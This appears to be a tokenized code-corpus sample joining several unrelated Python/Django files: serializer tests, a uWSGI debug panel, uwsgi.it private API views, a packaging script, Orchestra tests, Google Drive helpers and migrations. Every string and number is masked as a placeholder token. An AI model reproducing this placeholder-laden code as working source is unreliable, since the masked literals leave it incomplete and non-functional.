<EOL> serializer = ModelValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT>' in serializer . errors <EOL> def test_validators_passing ( self ) : <EOL> serializer = ModelValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors </s>
<s> from debug_toolbar . panels import Panel <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from . import uwsgi <EOL> class UwsgiPanel ( Panel ) : <EOL> """<STR_LIT>""" <EOL> title = _ ( '<STR_LIT>' ) <EOL> nav_title = _ ( '<STR_LIT>' ) <EOL> template = '<STR_LIT>' <EOL> @ property <EOL> def nav_subtitle ( self ) : <EOL> if uwsgi is not None : <EOL> status = _ ( '<STR_LIT>' ) % ( <EOL> uwsgi . version , uwsgi . numproc ) <EOL> else : <EOL> status = _ ( '<STR_LIT>' ) <EOL> return status <EOL> def process_response ( self , request , response ) : <EOL> if uwsgi is None : <EOL> self . record_stats ( { '<STR_LIT>' : True } ) <EOL> else : <EOL> from . stats import get_uwsgi_stats <EOL> self . record_stats ( get_uwsgi_stats ( ) ) </s>
<s> from django . http import HttpResponse , HttpResponseForbidden <EOL> from django . template . loader import render_to_string <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> from uwsgi_it_api . utils import spit_json , check_body <EOL> from uwsgi_it_api . decorators import need_certificate <EOL> from uwsgi_it_api . models import * <EOL> from uwsgi_it_api . config import UWSGI_IT_BASE_UID <EOL> import json <EOL> import datetime <EOL> @ need_certificate <EOL> @ csrf_exempt <EOL> def private_server_file_metadata ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> j = json . loads ( request . read ( ) ) <EOL> metadata = ServerFileMetadata . objects . get ( filename = j [ '<STR_LIT:file>' ] ) <EOL> sm , created = ServerMetadata . objects . get_or_create ( server = server , metadata = metadata ) <EOL> sm . value = j [ '<STR_LIT:value>' ] <EOL> sm . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> files = [ ] <EOL> for _file in ServerFileMetadata . objects . all ( ) : <EOL> files . append ( _file . filename ) <EOL> return spit_json ( request , files ) <EOL> except : <EOL> import sys <EOL> print sys . exc_info ( ) <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_custom_services ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> j = [ { '<STR_LIT>' : service . customer . pk , '<STR_LIT>' : service . config , '<STR_LIT>' : service . munix , '<STR_LIT:id>' : service . pk } for service in server . customservice_set . 
all ( ) ] <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_containers ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> j = [ { '<STR_LIT>' : container . uid , '<STR_LIT>' : container . munix , '<STR_LIT>' : container . ssh_keys_munix } for container in server . container_set . exclude ( distro__isnull = True ) . exclude ( ssh_keys_raw__exact = '<STR_LIT>' ) . exclude ( ssh_keys_raw__isnull = True ) ] <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_loopboxes ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> j = [ { '<STR_LIT:id>' : loopbox . pk , '<STR_LIT>' : loopbox . container . uid , '<STR_LIT:filename>' : loopbox . filename , '<STR_LIT>' : loopbox . mountpoint , '<STR_LIT>' : loopbox . ro } for loopbox in Loopbox . objects . filter ( container__server = server ) ] <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_portmappings ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> unix = server . portmappings_munix <EOL> pmappings = [ ] <EOL> for portmap in Portmap . objects . filter ( container__server = server ) : <EOL> pmappings . append ( { <EOL> '<STR_LIT>' : portmap . proto , <EOL> '<STR_LIT>' : str ( portmap . container . server . address ) , <EOL> '<STR_LIT>' : portmap . public_port , <EOL> '<STR_LIT>' : str ( portmap . container . ip ) , <EOL> '<STR_LIT>' : portmap . private_port , <EOL> } ) <EOL> if portmap . munix > unix : <EOL> unix = portmap . 
munix <EOL> j = { '<STR_LIT>' : unix , '<STR_LIT>' : pmappings } <EOL> return spit_json ( request , j ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_container_ini ( request , id ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if not container . distro or not container . ssh_keys_raw : raise Exception ( "<STR_LIT>" ) <EOL> j = render_to_string ( '<STR_LIT>' , { '<STR_LIT>' : container } ) <EOL> return HttpResponse ( j , content_type = "<STR_LIT>" ) <EOL> except : <EOL> import sys <EOL> print sys . exc_info ( ) <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_container_ssh_keys ( request , id ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if not container . distro or not container . ssh_keys_raw : raise Exception ( "<STR_LIT>" ) <EOL> return HttpResponse ( container . ssh_keys_raw , content_type = "<STR_LIT>" ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_legion_nodes ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> nodes = [ ] <EOL> unix = server . munix <EOL> if server . legion_set . count ( ) > <NUM_LIT:0> : <EOL> for node in server . legion_set . first ( ) . nodes . all ( ) : <EOL> if node . address != server . address : <EOL> if node . munix > unix : unix = node . munix <EOL> nodes . append ( node . address ) <EOL> return HttpResponse ( json . 
dumps ( { '<STR_LIT>' : unix , '<STR_LIT>' : nodes } ) , content_type = "<STR_LIT>" ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_nodes ( request ) : <EOL> try : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> nodes = [ ] <EOL> unix = server . munix <EOL> for node in Server . objects . all ( ) : <EOL> if node . address != server . address : <EOL> if node . munix > unix : unix = node . munix <EOL> nodes . append ( node . address ) <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : unix , '<STR_LIT>' : nodes } ) , content_type = "<STR_LIT>" ) <EOL> except : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> @ need_certificate <EOL> def private_domains_rsa ( request ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> server_customers = Customer . objects . filter ( container__server = server ) <EOL> j = [ ] <EOL> for customer in server_customers : <EOL> domains = [ ] <EOL> for domain in customer . domain_set . all ( ) : <EOL> domains . append ( { '<STR_LIT:name>' : domain . name , '<STR_LIT>' : domain . munix } ) <EOL> j . append ( { '<STR_LIT>' : customer . rsa_pubkey , '<STR_LIT>' : domains } ) <EOL> return spit_json ( request , j ) <EOL> def private_metrics_domain_do ( request , id , metric ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> j = json . loads ( request . read ( ) ) <EOL> d = datetime . datetime . fromtimestamp ( int ( j [ '<STR_LIT>' ] ) ) <EOL> domain = Domain . objects . get ( name = j [ '<STR_LIT>' ] , customer = container . customer ) <EOL> try : <EOL> m = metric . objects . get ( domain = domain , container = container , year = d . 
year , month = d . month , day = d . day ) <EOL> except : <EOL> m = metric ( domain = domain , container = container , year = d . year , month = d . month , day = d . day , json = '<STR_LIT>' ) <EOL> m_json = json . loads ( m . json ) <EOL> m_json . append ( [ int ( j [ '<STR_LIT>' ] ) , long ( j [ '<STR_LIT:value>' ] ) ] ) <EOL> m . json = json . dumps ( m_json ) <EOL> m . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> else : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_domain_net_rx ( request , id ) : <EOL> return private_metrics_domain_do ( request , id , NetworkRXDomainMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_domain_net_tx ( request , id ) : <EOL> return private_metrics_domain_do ( request , id , NetworkTXDomainMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_domain_hits ( request , id ) : <EOL> return private_metrics_domain_do ( request , id , HitsDomainMetric ) <EOL> def private_metrics_container_do ( request , id , metric ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> j = json . loads ( request . read ( ) ) <EOL> d = datetime . datetime . fromtimestamp ( int ( j [ '<STR_LIT>' ] ) ) <EOL> try : <EOL> m = metric . objects . get ( container = container , year = d . year , month = d . month , day = d . day ) <EOL> except : <EOL> m = metric ( container = container , year = d . year , month = d . month , day = d . day , json = '<STR_LIT>' ) <EOL> m_json = json . loads ( m . json ) <EOL> m_json . 
append ( [ int ( j [ '<STR_LIT>' ] ) , long ( j [ '<STR_LIT:value>' ] ) ] ) <EOL> m . json = json . dumps ( m_json ) <EOL> m . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> else : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_mem ( request , id ) : <EOL> return private_metrics_container_do ( request , id , MemoryContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_mem_rss ( request , id ) : <EOL> return private_metrics_container_do ( request , id , MemoryRSSContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_mem_cache ( request , id ) : <EOL> return private_metrics_container_do ( request , id , MemoryCacheContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_cpu ( request , id ) : <EOL> return private_metrics_container_do ( request , id , CPUContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_io_read ( request , id ) : <EOL> return private_metrics_container_do ( request , id , IOReadContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_io_write ( request , id ) : <EOL> return private_metrics_container_do ( request , id , IOWriteContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_net_rx ( request , id ) : <EOL> return private_metrics_container_do ( request , id , NetworkRXContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_net_tx ( request , id ) : <EOL> return private_metrics_container_do ( request , id , NetworkTXContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_metrics_container_quota ( request , id ) : <EOL> return 
private_metrics_container_do ( request , id , QuotaContainerMetric ) <EOL> @ csrf_exempt <EOL> @ need_certificate <EOL> def private_alarms ( request , id ) : <EOL> server = Server . objects . get ( address = request . META [ '<STR_LIT>' ] ) <EOL> container = server . container_set . get ( pk = ( int ( id ) - UWSGI_IT_BASE_UID ) ) <EOL> if request . method != '<STR_LIT:POST>' : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response <EOL> response = check_body ( request ) <EOL> if response : return response <EOL> msg = request . read ( ) <EOL> if '<STR_LIT>' in request . GET : <EOL> d = datetime . datetime . fromtimestamp ( int ( request . GET [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> d = datetime . datetime . now ( ) <EOL> alarm = Alarm ( container = container , unix = d ) <EOL> alarm . level = <NUM_LIT:0> <EOL> alarm . msg = msg <EOL> alarm . save ( ) <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . status_code = <NUM_LIT> <EOL> return response </s>
<s> import argparse <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> from management_tools import loggers <EOL> class ChDir : <EOL> def __init__ ( self , newPath ) : <EOL> self . savedPath = os . getcwd ( ) <EOL> os . chdir ( newPath ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> os . chdir ( self . savedPath ) <EOL> def set_globals ( ) : <EOL> '''<STR_LIT>''' <EOL> global options <EOL> options = { } <EOL> options [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> options [ '<STR_LIT:name>' ] = '<STR_LIT:_>' . join ( options [ '<STR_LIT>' ] . lower ( ) . split ( ) ) <EOL> options [ '<STR_LIT:version>' ] = '<STR_LIT>' <EOL> def setup_logger ( ) : <EOL> '''<STR_LIT>''' <EOL> global logger <EOL> if options [ '<STR_LIT>' ] : <EOL> if not options [ '<STR_LIT>' ] : <EOL> logger = loggers . file_logger ( options [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> logger = loggers . file_logger ( options [ '<STR_LIT:name>' ] , path = options [ '<STR_LIT>' ] ) <EOL> else : <EOL> logger = loggers . stream_logger ( <NUM_LIT:1> ) <EOL> def parse_options ( ) : <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:version>' , version = options [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + options [ '<STR_LIT:version>' ] , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> options [ '<STR_LIT:input>' ] = args . input <EOL> options [ '<STR_LIT>' ] = args . output <EOL> options [ '<STR_LIT>' ] = not args . 
no_log <EOL> options [ '<STR_LIT>' ] = args . log <EOL> def main ( ) : <EOL> set_globals ( ) <EOL> parse_options ( ) <EOL> setup_logger ( ) <EOL> if not options [ '<STR_LIT:input>' ] : <EOL> options [ '<STR_LIT:input>' ] = '<STR_LIT>' <EOL> else : <EOL> options [ '<STR_LIT:input>' ] = os . path . expanduser ( options [ '<STR_LIT:input>' ] ) <EOL> if not os . path . isdir ( options [ '<STR_LIT:input>' ] ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> options [ '<STR_LIT:input>' ] = os . path . abspath ( options [ '<STR_LIT:input>' ] ) <EOL> if not options [ '<STR_LIT:input>' ] . endswith ( '<STR_LIT:/>' ) : <EOL> options [ '<STR_LIT:input>' ] += '<STR_LIT:/>' <EOL> if not os . path . isfile ( options [ '<STR_LIT:input>' ] + '<STR_LIT>' ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> if not options [ '<STR_LIT>' ] : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT:input>' ] + os . path . basename ( os . path . dirname ( options [ '<STR_LIT:input>' ] ) ) <EOL> else : <EOL> options [ '<STR_LIT>' ] = os . path . abspath ( os . path . expanduser ( options [ '<STR_LIT>' ] ) ) <EOL> if not os . path . isdir ( os . path . dirname ( options [ '<STR_LIT>' ] ) ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> if not os . access ( os . path . dirname ( options [ '<STR_LIT>' ] ) , os . W_OK ) : <EOL> logger . error ( "<STR_LIT>" + options [ '<STR_LIT>' ] ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> logger . info ( "<STR_LIT>" + options [ '<STR_LIT:input>' ] + "<STR_LIT>" + options [ '<STR_LIT>' ] + "<STR_LIT:'>" ) <EOL> with ChDir ( options [ '<STR_LIT:input>' ] ) as c : <EOL> files = [ f for f in os . listdir ( '<STR_LIT:.>' ) if os . path . isfile ( f ) and f . endswith ( '<STR_LIT>' ) ] <EOL> try : <EOL> subprocess . call ( [ '<STR_LIT>' , options [ '<STR_LIT>' ] + '<STR_LIT>' ] + files ) <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . 
exit ( <NUM_LIT:10> ) <EOL> with open ( options [ '<STR_LIT>' ] , '<STR_LIT:w>' ) as outfile : <EOL> echo = subprocess . Popen ( [ '<STR_LIT>' , r'<STR_LIT>' ] , stdout = subprocess . PIPE ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT:->' , options [ '<STR_LIT>' ] + '<STR_LIT>' ] , stdin = echo . stdout , stdout = outfile ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> os . chmod ( options [ '<STR_LIT>' ] , <NUM_LIT:0> <NUM_LIT> ) <EOL> os . remove ( options [ '<STR_LIT>' ] + '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" + options [ '<STR_LIT>' ] + "<STR_LIT:'>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from unittest . mock import patch <EOL> from orchestra . tests . helpers import OrchestraAuthenticatedTestCase <EOL> from orchestra . models import CommunicationPreference <EOL> from orchestra . tests . helpers . fixtures import WorkerFactory <EOL> from orchestra . tests . helpers . fixtures import setup_models <EOL> class AccountSettingsTest ( OrchestraAuthenticatedTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ) . setUp ( ) <EOL> self . request_client , self . user = self . authenticate_user ( ) <EOL> self . url = reverse ( '<STR_LIT>' ) <EOL> self . worker = WorkerFactory ( user = self . user ) <EOL> def _get_account_settings_mock_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def test_get_form ( self ) : <EOL> response = self . request_client . get ( self . url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTemplateUsed ( response , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_change_all_fields ( self , mock_get_slack_user_id ) : <EOL> mock_get_slack_user_id . return_value = '<STR_LIT>' <EOL> data = self . _get_account_settings_mock_data ( ) <EOL> response = self . request_client . post ( self . url , data ) <EOL> self . assertTrue ( response . context [ '<STR_LIT:success>' ] ) <EOL> self . user . refresh_from_db ( ) <EOL> self . assertEqual ( self . user . first_name , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . user . last_name , data [ '<STR_LIT>' ] ) <EOL> self . worker . refresh_from_db ( ) <EOL> self . assertEqual ( self . worker . slack_username , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . worker . phone , data [ '<STR_LIT>' ] + data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . worker . 
slack_user_id , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_missing_fields ( self , mock_get_slack_user_id ) : <EOL> mock_get_slack_user_id . return_value = '<STR_LIT>' <EOL> required_fields = self . _get_account_settings_mock_data ( ) . keys ( ) <EOL> for field in required_fields : <EOL> data = self . _get_account_settings_mock_data ( ) <EOL> data . pop ( field ) <EOL> response = self . request_client . post ( self . url , data ) <EOL> self . assertFalse ( response . context [ '<STR_LIT:success>' ] ) <EOL> class CommunicationPreferenceSettingsTest ( OrchestraAuthenticatedTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ) . setUp ( ) <EOL> setup_models ( self ) <EOL> self . url = reverse ( '<STR_LIT>' ) <EOL> self . request_client , self . user = self . authenticate_user ( ) <EOL> worker = self . workers [ <NUM_LIT:0> ] <EOL> worker . user = self . user <EOL> worker . save ( ) <EOL> self . comm_pref = CommunicationPreference . objects . filter ( <EOL> worker = worker ) . first ( ) <EOL> def test_get_form ( self ) : <EOL> response = self . request_client . get ( self . url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTemplateUsed ( <EOL> response , '<STR_LIT>' ) <EOL> def _get_mock_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : self . comm_pref . id , <EOL> } <EOL> def test_disable_email ( self ) : <EOL> data = self . _get_mock_data ( ) <EOL> response = self . request_client . post ( self . url , data ) <EOL> self . assertTrue ( response . context [ '<STR_LIT:success>' ] ) <EOL> self . comm_pref . refresh_from_db ( ) <EOL> self . assertFalse ( self . comm_pref . methods . email . is_set ) </s>
<s> from collections import Counter <EOL> from datetime import date <EOL> import logging <EOL> import os <EOL> import re <EOL> import tempfile <EOL> from django . conf import settings <EOL> import requests <EOL> from orchestra . google_apps . errors import FailedRequest <EOL> from orchestra . google_apps . errors import InvalidUrlError <EOL> from orchestra . google_apps . errors import GoogleDriveError <EOL> from orchestra . google_apps . permissions import read_with_link_permission <EOL> from orchestra . google_apps . permissions import write_with_link_permission <EOL> from orchestra . google_apps . service import Service <EOL> from orchestra . utils . common_regex import image_file_regex <EOL> from orchestra . utils . settings import run_if <EOL> logger = logging . getLogger ( __name__ ) <EOL> _image_mimetype_regex = re . compile ( '<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> TEAM_MESSAGES_TEMPLATE_ID = '<STR_LIT>' <EOL> def _get_image_mimetype ( response , title ) : <EOL> """<STR_LIT>""" <EOL> if ( response . headers . get ( '<STR_LIT>' ) and <EOL> _image_mimetype_regex . search ( response . headers <EOL> . get ( '<STR_LIT>' ) ) ) : <EOL> return response . headers . get ( '<STR_LIT>' ) <EOL> extension = title . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> return '<STR_LIT>' . format ( extension ) <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def add_image ( service , folder_id , url ) : <EOL> """<STR_LIT>""" <EOL> response = requests . get ( url , stream = True ) <EOL> if response . status_code != <NUM_LIT:200> : <EOL> raise FailedRequest ( '<STR_LIT>' <EOL> '<STR_LIT>' , ( url ) ) <EOL> temp = tempfile . NamedTemporaryFile ( mode = '<STR_LIT:wb>' , delete = False ) <EOL> for chunk in response . iter_content ( <NUM_LIT> ) : <EOL> temp . write ( chunk ) <EOL> title_regex = image_file_regex . search ( response . url ) <EOL> if title_regex is None : <EOL> raise InvalidUrlError ( '<STR_LIT>' ) <EOL> title = title_regex . 
group ( ) <EOL> mimetype = _get_image_mimetype ( response , title ) <EOL> temp . close ( ) <EOL> google_image = service . insert_file ( title , <EOL> '<STR_LIT:image>' , <EOL> folder_id , <EOL> mimetype , <EOL> temp . name ) <EOL> os . unlink ( temp . name ) <EOL> return google_image <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_media_folder_with_images ( parent_id , image_links , folder_name ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> folder = create_folder_with_permissions ( parent_id , <EOL> folder_name , <EOL> [ read_with_link_permission ] ) <EOL> folder_id = folder [ '<STR_LIT:id>' ] <EOL> counter = Counter ( ) <EOL> for image_link in image_links : <EOL> try : <EOL> image = add_image ( service , folder_id , image_link ) <EOL> counter [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> logger . info ( '<STR_LIT>' , image ) <EOL> except ( InvalidUrlError , FailedRequest ) : <EOL> counter [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> logger . exception ( '<STR_LIT>' , <EOL> image_link ) <EOL> return { '<STR_LIT>' : folder , <EOL> '<STR_LIT>' : counter } <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_folder_with_permissions ( parent_id , folder_name , permissions = None ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> folder = service . insert_folder ( folder_name , parent_id ) <EOL> if folder is None : <EOL> raise GoogleDriveError ( '<STR_LIT>' ) <EOL> permissions = permissions or [ ] <EOL> for permission in permissions : <EOL> service . add_permission ( folder . get ( '<STR_LIT:id>' ) , <EOL> permission ) <EOL> return folder <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_project_google_folder ( project ) : <EOL> """<STR_LIT>""" <EOL> today = date . today ( ) . strftime ( '<STR_LIT>' ) <EOL> parent_id = ( project . project_data . get ( '<STR_LIT>' ) or <EOL> settings . 
GOOGLE_PROJECT_ROOT_ID ) <EOL> folder = create_folder_with_permissions ( <EOL> parent_id , <EOL> '<STR_LIT:U+0020>' . join ( ( today , project . short_description ) ) , <EOL> [ write_with_link_permission ] ) <EOL> folder_id = folder . get ( '<STR_LIT:id>' ) <EOL> project . project_data [ '<STR_LIT>' ] = folder_id <EOL> project . team_messages_url = create_document_from_template ( <EOL> TEAM_MESSAGES_TEMPLATE_ID , <EOL> '<STR_LIT>' , <EOL> [ folder_id ] , <EOL> [ write_with_link_permission ] ) [ '<STR_LIT>' ] <EOL> project . save ( ) <EOL> return folder <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_document_from_template ( template_id , name , <EOL> parent_ids = None , permissions = None ) : <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> upload_info = service . copy_file ( template_id , name , <EOL> parent_ids = parent_ids ) <EOL> if upload_info is None : <EOL> raise GoogleDriveError ( '<STR_LIT>' . format ( name ) ) <EOL> logger . info ( upload_info ) <EOL> document_id = upload_info . get ( '<STR_LIT:id>' ) <EOL> permissions = permissions or [ ] <EOL> for permission in permissions : <EOL> service . add_permission ( document_id , permission ) <EOL> upload_info [ '<STR_LIT:status>' ] = '<STR_LIT:success>' <EOL> upload_info [ '<STR_LIT:id>' ] = document_id <EOL> return upload_info <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def download_file ( file_metadata ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> mimetype = file_metadata [ '<STR_LIT>' ] <EOL> title = file_metadata [ '<STR_LIT:title>' ] <EOL> return service . get_file_content ( file_metadata [ '<STR_LIT:id>' ] ) , title , mimetype <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def upload_file ( parent_id , file_path , title , description , mimetype ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . 
GOOGLE_SERVICE_EMAIL ) <EOL> file_metadata = service . insert_file ( <EOL> title , <EOL> description , <EOL> parent_id , <EOL> mimetype , <EOL> file_path <EOL> ) <EOL> return file_metadata </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:status>' , <EOL> field = models . IntegerField ( default = <NUM_LIT:0> , choices = [ ( - <NUM_LIT:1> , '<STR_LIT>' ) , ( <NUM_LIT:0> , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , max_length = <NUM_LIT:200> ) , <EOL> ) , <EOL> ] </s>
from __future__ import unicode_literals

from django.db import migrations, models
import django.utils.timezone


class Migration(migrations.Migration):
    # Auto-generated schema migration: adds a timestamp field (defaulting to
    # "now") and a boolean flag (defaulting to False) to the same model.

    dependencies = [
        ('<STR_LIT>', '<STR_LIT>'),
    ]

    operations = [
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.DateTimeField(
                default=django.utils.timezone.now,
            ),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.BooleanField(
                default=False,
            ),
        ),
    ]
